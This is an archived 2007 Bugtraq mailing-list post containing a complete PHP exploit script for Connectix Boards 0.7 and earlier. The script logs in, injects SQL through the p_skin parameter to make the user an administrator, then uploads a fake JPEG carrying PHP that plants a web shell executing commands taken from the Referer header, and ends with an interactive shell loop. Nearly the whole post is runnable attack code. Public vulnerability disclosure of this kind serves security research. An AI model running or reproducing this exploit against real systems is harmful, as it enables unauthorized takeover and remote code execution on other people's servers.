lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070221173000.4321.qmail@securityfocus.com>
Date: 21 Feb 2007 17:30:00 -0000
From: gmdarkfig@...il.com
To: bugtraq@...urityfocus.com
Subject: Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit

#!/usr/bin/php
<?php
/**
 * This file require the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");
error_reporting(E_ALL ^ E_NOTICE);

if($argc < 9) {
print("
 Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit
-------------------------------------------------------------------
PHP conditions: none
       Credits: DarkFig <gmdarkfig@...il.com>
           URL: http://www.acid-root.new.fr/
-------------------------------------------------------------------
  Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options]
 Params: -url       For example http://victim.com/connectix/ 
         -usr       The username of your account
         -pwd       The password of your account
         -type      Privilege Escalation(1) or Code execution(2)
Options: -proxy     If you wanna use a proxy <proxyhost:proxyport> 
         -proxyauth Basic authentification <proxyuser:proxypwd> 
-------------------------------------------------------------------
"); exit(1);
}

$url    = getparam('url',1);
$user   = getparam('usr',1);
$pass   = getparam('pwd',1);
$type   = getparam('type',1);
$proxy  = getparam('proxy');
$authp  = getparam('proxyauth');
$theme  = 'Zephyr';

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
$xpl->allowredirection(1);
$xpl->cookiejar(1);
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);

print "\nTrying to get logged in";
$xpl->post($url.'index.php?act=login',"username=$user&password=$pass&remember=on&confirm=Connexion+%21");
if(preg_match("#password#",$xpl->showcookie())) print "\nLogged in";
else exit("\nExploit failed");

sploit(", usr_class=1");
if($type==1) exit("\nDone, $user is now admin.");

# Fake JPG (with php code) generated with edjpgcom.exe
#
# <?php $handle=fopen('mdrpipicacalolxdwtf.gif.php','w+');
# fwrite($handle,'<?php @system($_SERVER[HTTP_REFERER]); ?/>');
# fclose($handle); unlink($_SERVER[PHP_SELF]); ?/>
#
$f = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00\x60\x00\x60\x00\x00\xFF"
    ."\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05\x08\x07\x07\x07\x09\x09\x08\x0A\x0C\x14"
    ."\x0D\x0C\x0B\x0B\x0C\x19\x12\x13\x0F\x14\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24"
    ."\x2E\x27\x20\x22\x2C\x23\x1C\x1C\x28\x37\x29\x2C\x30\x31\x34\x34\x34\x1F\x27\x39"
    ."\x3D\x38\x32\x3C\x2E\x33\x34\x32\xFF\xDB\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18"
    ."\x0D\x0D\x18\x32\x21\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
    ."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
    ."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\xFF\xFE\x00"
    ."\xA5\x3C\x3F\x70\x68\x70\x20\x24\x68\x61\x6E\x64\x6C\x65\x3D\x66\x6F\x70\x65\x6E"
    ."\x28\x27\x6D\x64\x72\x70\x69\x70\x69\x63\x61\x63\x61\x6C\x6F\x6C\x78\x64\x77\x74"
    ."\x66\x2E\x67\x69\x66\x2E\x70\x68\x70\x27\x2C\x27\x77\x2B\x27\x29\x3B\x66\x77\x72"
    ."\x69\x74\x65\x28\x24\x68\x61\x6E\x64\x6C\x65\x2C\x27\x3C\x3F\x70\x68\x70\x20\x40"
    ."\x73\x79\x73\x74\x65\x6D\x28\x24\x5F\x53\x45\x52\x56\x45\x52\x5B\x48\x54\x54\x50"
    ."\x5F\x52\x45\x46\x45\x52\x45\x52\x5D\x29\x3B\x20\x3F\x3E\x27\x29\x3B\x66\x63\x6C"
    ."\x6F\x73\x65\x28\x24\x68\x61\x6E\x64\x6C\x65\x29\x3B\x20\x75\x6E\x6C\x69\x6E\x6B"
    ."\x28\x24\x5F\x53\x45\x52\x56\x45\x52\x5B\x50\x48\x50\x5F\x53\x45\x4C\x46\x5D\x29"
    ."\x3B\x20\x3F\x3E\xFF\xC0\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01"
    ."\x03\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01\x01\x01\x01\x01\x00\x00\x00"
    ."\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5"
    ."\x10\x00\x02\x01\x03\x03\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03"
    ."\x00\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14\x32\x81\x91\xA1"
    ."\x08\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33\x62\x72\x82\x09\x0A\x16\x17\x18\x19"
    ."\x1A\x25\x26\x27\x28\x29\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48"
    ."\x49\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74"
    ."\x75\x76\x77\x78\x79\x7A\x83\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97"
    ."\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9"
    ."\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE1"
    ."\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF"
    ."\xC4\x00\x1F\x01\x00\x03\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00"
    ."\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x11\x00\x02\x01"
    ."\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01\x02\x77\x00\x01\x02\x03\x11\x04\x05"
    ."\x21\x31\x06\x12\x41\x51\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1"
    ."\x09\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1\x17\x18\x19\x1A"
    ."\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48\x49\x4A\x53"
    ."\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77"
    ."\x78\x79\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99"
    ."\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2"
    ."\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4"
    ."\xE5\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xDA\x00\x0C\x03"
    ."\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF7\xFA\x28\xA2\x80\x3F\xFF\xD9";

# +admin.bbcode.php
# |
# 95. if(isset($_POST['wherefile'])) {
# 96. if ($_POST['wherefile']=='upload') {
# 97. if (!empty($_FILES['uploadimage']['size'])){
# 98. if ($image=getimagesize(trim($_FILES['uploadimage']['tmp_name']))) {
# 99. $val = array(IMAGETYPE_GIF,IMAGETYPE_JPEG,IMAGETYPE_PNG);
# 100. if ($_FILES['uploadimage']['size'] <= 20480 && in_array($image[2],$val)) {
# 101. $filename = $smile->smiley_librariesdir.$_POST['sm_filenameserver'];
# 102. $filename = str_replace('../','',trim($filename));
# 103. //si le filenameserver contient un dossier : on crée ce dossier:
# 104. mkdirs($smile->smiley_dir.dirname($filename));
# 105. if (move_uploaded_file($_FILES['uploadimage']['tmp_name'], $smile->smiley_dir.$_POST['sm_filenameserver'])) {
# 106. $do=true;
# 107. }
#
$arr = array(frmdt_url => $url.'admin.php?act=bb&sub=4',
             "sm_name" => ":AbCdEfGhIj1234dsupersmilepowaa:",
             "sm_filenamesubdir" => "libraries/",
             "sm_filenameserver" => "xd.gif.php",
             "wherefile" => "upload",
             "sm_send" => "Confirmer",
             "uploadimage" => array(frmdt_type => "image/gif",
                                    frmdt_filename => "xd.gif.php",
                                    frmdt_content => $f));
$xpl->formdata($arr);
$xpl->get($url."smileys/xd.gif.php");
print "\n\$shell> ";

while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN)))))
{
    $xpl->addheader("Referer",$cmd);
    $xpl->get($url."smileys/mdrpipicacalolxdwtf.gif.php");
    print $xpl->getcontent()."\n\$shell> ";
}                                   

function sploit($sql)
{
	global $url,$xpl,$theme,$user;
	$pdat = "changeparams=1"
           ."&p_usrs=20"
           ."&p_topics=20"
           ."&p_msgs=15"
           ."&p_res=12"
           ."&p_skin=$theme"
           ."%00',usr_pref_skin='$theme',usr_signature=(SELECT '[XPL_IS_OK]')$sql WHERE usr_name='$user' #"
           ."&p_lang=fr"
           ."&p_timezone=1";

           # +common.php
           # |
           # 95. function cleanArray(&$arr) {
           # 96.	if (!empty($arr) && is_array($arr)) {
           # 97.		foreach($arr as $k => $v) {
           # 98.			if (is_array($v)) cleanArray($arr[$k]);
           # 99.			else $arr[$k] = stripslashes($v);
           # 100.		}
           # 101.	}
           # 102. }
           # |
           # 105. if (get_magic_quotes_gpc()) {
           # 106.	cleanArray($_POST);
           # 107.	cleanArray($_COOKIE);
           # 108.	cleanArray($_GET);
           # 109. }
           #
           # +part.userprofile.php
           # |
           # 305. /* Changement des paramètres d'affichage (pas accessible par les modos ou admins) */
           # 306. } elseif (isset($_POST['changeparams']) && $edit_id==$_SESSION['userid']) {
           # 307. if ( isset($_POST['p_usrs'],$_POST['p_topics'],$_POST['p_msgs'],$_POST['p_res'],$_POST['p_skin'],$_POST['p_lang'],$_POST['p_timezone']) ) {
           # 308. if (is_numeric($_POST['p_usrs']) && is_numeric($_POST['p_topics']) && is_numeric($_POST['p_msgs']) && is_numeric($_POST['p_res']) && isLang($_POST['p_lang']) && isSkin($_POST['p_skin'])) {
           # 309. if ((int)$_POST['p_usrs']>=5 && (int)$_POST['p_usrs']<=50 && (int)$_POST['p_topics']>=5 && (int)$_POST['p_topics']<=50 && (int)$_POST['p_msgs']>=5 && (int)$_POST['p_msgs']<=50 && (int)$_POST['p_res']>=5 && (int)$_POST['p_res']<=50 && in_array($_POST['p_timezone'],array_keys($timezones))) {
           # 310. $GLOBALS['cb_db']->query("UPDATE ".$GLOBALS['cb_db']->prefix."users SET usr_pref_msgs='".(int)$_POST['p_msgs']."',usr_pref_usrs='".(int)$_POST['p_usrs']."',usr_pref_topics='".(int)$_POST['p_topics']."',usr_pref_res='".(int)$_POST['p_res']."',usr_pref_lang='".$_POST['p_lang']."',usr_pref_skin='".$_POST['p_skin']."',usr_pref_timezone='".$_POST['p_timezone']."',usr_pref_ctsummer=".((int)(isset($_POST['p_ctsummer']) && $_POST['p_ctsummer']=='on'))." WHERE usr_id=".$_SESSION['cb_user']->userid);
           # 311. $_SESSION['cb_user']->reloadnext=true;
           # 312. redirect(manage_url('index.php?act=user&editprofile='.$_SESSION['userid'].'&page=6','forum-profile'.$_SESSION['userid'].'-params.html'));
           #
           # +lib.cb.php
           # |
           # 117. function isLang ($langtype) {
           # 118.	return is_dir(CB_PATH.'lang/'.$langtype);
           # 119. }
           # |
           # 133. function isSkin ($skintype) {
           # 134.	return is_dir(CB_PATH.'skins/'.$skintype);
           # 135. }
           $xpl->post($url."index.php?act=user&editprofile=-1&page=6",$pdat);
           $xpl->get($url."index.php?act=user&editprofile=-1&page=5");
           
           if(preg_match('#[XPL_IS_OK]#',$xpl->getcontent())) return;
           else exit("Exploit failed");
}

function getparam($param,$opt='')
{
	global $argv;
	foreach($argv as $value => $key)
	{
		if($key == '-'.$param) return $argv[$value+1];
	}
	if($opt) exit("\n-$param parameter required");
	else return;
}


?>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ